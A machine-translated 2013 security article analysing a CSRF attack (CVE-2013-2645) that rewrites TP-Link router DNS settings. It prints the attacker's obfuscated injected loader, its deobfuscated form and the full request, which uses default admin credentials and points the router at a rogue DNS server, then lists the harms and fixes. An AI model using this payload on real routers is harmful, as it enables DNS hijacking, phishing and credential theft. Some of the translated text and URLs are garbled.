Sleepy Dragon · 2013/10/31 16:24
0 x00 background
Route is attacked by CSRF, the topic of modifying DNS has been more active recently, but there seems to be no detailed analysis of this vulnerability in domestic technical articles, the cause of the vulnerability is relatively simple, this popular science.
This article is a use of CVE-2013-2645 vulnerability, to modify THE DNS case of TP-link, the attack against other routes are similar.
0 x01 EXP analysis
An attacker would add a piece of javascript code to his or her own site or to a site already under his control:
document.write("<script type=\"text/javascript\" src=\"http://www.xxxxxx.com/js/ma.js\">");
Copy the code
Javascript code dynamically loads a ma.js file from an external site. Look at the contents of the ma.js file:
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?" ":e(parseInt(c/a)))+((c=c%a)>35? String.fromCharCode(c+29):c.toString(36))}; if(! ''.replace(/^/,String)){while(c--)d[e(c)]=k[c][/c]||e(c); k=[function(e){return d[e]}]; e=function(){return'\\w+'}; c=1; }; while(c--)if(k[c][/c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c][/c]); return p; }('T w$=["\\E\\6\\5\\m\\o\\3\\q\\5\\m\\8\\3\\7\\"\\5\\3\\G\\5\\j\\r\\6\\6\\"\\y\\B\\d\\e\\8\\v\\4\\5\\q\\u\\4\\o\\H\\n\\5\\5\ \8\\A\\j\\j\\a\\i\\e\\d\\f\\A\\a\\i\\e\\d\\f\\B\\2\\k\\h\\1\\2\\g\\9\\1\\2\\1\\2\\j\\u\\6\\3\\4\\z\\8\\e\\j\\s\\a\\f\\F\ \n\\r\\8\\C\\3\\4\\l\\3\\4\\z\\8\\e\\1\\n\\5\\e\\I\\i\\n\\r\\8\\6\\3\\4\\l\\3\\4\\7\\2\\c\\d\\8\\2\\7\\2\\k\\h\\1\\2\\g\ \9\\1\\2\\1\\2\\b\\b\\c\\d\\8\\h\\7\\2\\k\\h\\1\\2\\g\\9\\1\\2\\1\\2\\k\\k\\c\\s\\3\\a\\6\\3\\7\\2\\h\\b\\c\\Q\\a\\5\\3\ \x\\a\\m\\7\\b\\1\\b\\1\\b\\1\\b\\c\\i\\v\\e\\a\\d\\f\\7\\c\\i\\f\\6\\6\\3\\4\\l\\3\\4\\7\\2\\b\\g\\1\\2\\9\\P\\1\\D\\g\ \1\\9\\R\\c\\i\\f\\6\\6\\3\\4\\l\\3\\4\\h\\7\\9\\1\\9\\1\\9\\1\\9\\c\\C\\a\\l\\3\\7\\p\\t\\2\\p\\S\\D\\O\\p\\t\\K\\p\\J\ \g\\L\\N\\E\\j\\6\\5\\m\\o\\3\\y\\q"]; M["\\x\\4\\d\\5\\3\\o\\f"](w$[0]); ', 56, 56, '| x2e | x31 | x65 | x72 | x74 | x73 | x3d | x70 | x38 | x61 | x | x26 | x69 | x6d | x6e | x36 | x32 | x64 | x2f | x39 | x76 | x79 | x68 | x6c | x25 | x20 | x63 | x4 c|x42|x75|x6f|_|x77|x3e|x52|x3a|x40|x53|x33|x3c|x44|x78|x28|x3f|x45|x34|x29|document|x3b|x2b|x37|x67|x35|x41|var'.split( '|'), and 0, {}))Copy the code
Eval executes a piece of obfuscating code. Replace eval with console.log and print it on the browser console:
var _$=["\x3c\x73\x74\x79\x6c\x65\x20\x74\x79\x70\x65\x3d\"\x74\x65\x78\x74\x2f\x63\x73\x73\"\x3e\x40\x69\x6d\x70\x6f\x72\x7 4\x20\x75\x72\x6c\x28\x68\x74\x74\x70\x3a\x2f\x2f\x61\x64\x6d\x69\x6e\x3a\x61\x64\x6d\x69\x6e\x40\x31\x39\x32\x2e\x31\x3 6\x38\x2e\x31\x2e\x31\x2f\x75\x73\x65\x72\x52\x70\x6d\x2f\x4c\x61\x6e\x44\x68\x63\x70\x53\x65\x72\x76\x65\x72\x52\x70\x6 d\x2e\x68\x74\x6d\x3f\x64\x68\x63\x70\x73\x65\x72\x76\x65\x72\x3d\x31\x26\x69\x70\x31\x3d\x31\x39\x32\x2e\x31\x36\x38\x2 e\x31\x2e\x31\x30\x30\x26\x69\x70\x32\x3d\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x2e\x31\x39\x39\x26\x4c\x65\x61\x73\x65\x3 d\x31\x32\x30\x26\x67\x61\x74\x65\x77\x61\x79\x3d\x30\x2e\x30\x2e\x30\x2e\x30\x26\x64\x6f\x6d\x61\x69\x6e\x3d\x26\x64\x6 e\x73\x73\x65\x72\x76\x65\x72\x3d\x31\x30\x36\x2e\x31\x38\x37\x2e\x33\x36\x2e\x38\x35\x26\x64\x6e\x73\x73\x65\x72\x76\x6 5\x72\x32\x3d\x38\x2e\x38\x2e\x38\x2e\x38\x26\x53\x61\x76\x65\x3d\x25\x42\x31\x25\x41\x33\x2b\x25\x42\x34\x25\x45\x36\x2 9\x3b\x3c\x2f\x73\x74\x79\x6c\x65\x3e\x20"]; document["\x77\x72\x69\x74\x65\x6c\x6e"](_$[0]);Copy the code
Still confusing code, but a lot easier to read than the original, just converting some strings to hexadecimal representation.
The hexadecimal section \x77\x72\x69\x74\x65\x6c\x6e represents the string writeln.
In javascript, document[“writeln”] is the same as document.writeln, which are two javascript ways of accessing object properties.
The code ultimately equates to:
document.writeln('<style type="text/css">@import url(http://admin:[email protected]/userRpm/LanDhcpServerRpm.htm? Dhcpserver = 1 & ip1 = 192.168.1.100 & ip2 = 192.168.1.199 & Lease = 120 & gateway = 0.0.0.0 & domain = & dnsserver = 106.187.36.85 & dnsserver2 = 8. 8.8.8 & Save = B1 B4 A3 + % % % % E6); </style>')Copy the code
Now it’s clear, write a style tag to import a CSS call to the browser to access the address:
http://admin:[email protected]/userRpm/LanDhcpServerRpm.htm? Dhcpserver = 1 & ip1 = 192.168.1.100 & ip2 = 192.168.1.199 & Lease = 120 & gateway = 0.0.0.0 & domain = & dnsserver = 106.187.36.85 & dnsserver2 = 8. 8.8.8 & Save = B1 B4 A3 + % % % % E6Copy the code
This is an obvious CSRF attack. The main purpose of the attacker is to change the DNS server to 106.187.36.85. In order for the attack to succeed, some necessary commit parameters are added, such as IP address range from 192.168.1.100-199, etc.
In order to ensure that all access is ok, Google DNS is added. When 106.187.36.85 has a domain name that cannot be resolved, go to 8.8.8.8 to obtain the address.
As for the principle, harm and repair methods of CSRF, DROPS has mentioned in an article before for reference:
CSRF is briefly introduced and used
It should be noted that this use is based on the default password of the route into the background to do a series of operations, if the router has changed the default user name and password, can avoid this harm, but if the browser is already in the background of the route, or the cookie is not invalid, the attack can still succeed.
0x02 Modifying DNS Hazards
Why would an attacker modify DNS? What can he do when he has access to DNS?
1. When a user opens a normal site, he or she is redirected to a phishing site. 2. Add horse code to normal website to control user PC. 3, software upgrade without signature, can control the software upgrade. 4. Intercept email passwords, website passwords and so on without using certificates. 5. Change the ads on your site to your own. (I think this is how Chinese hackers make money)Copy the code
0x03 How can I avoid this attack
1, you should first check whether your DNS has been changed. 2. Firmware of the upgrade route has been repaired for some models. 3. Change the router's default password. 4. After logging in to the route, click "Logout" to log out.Copy the code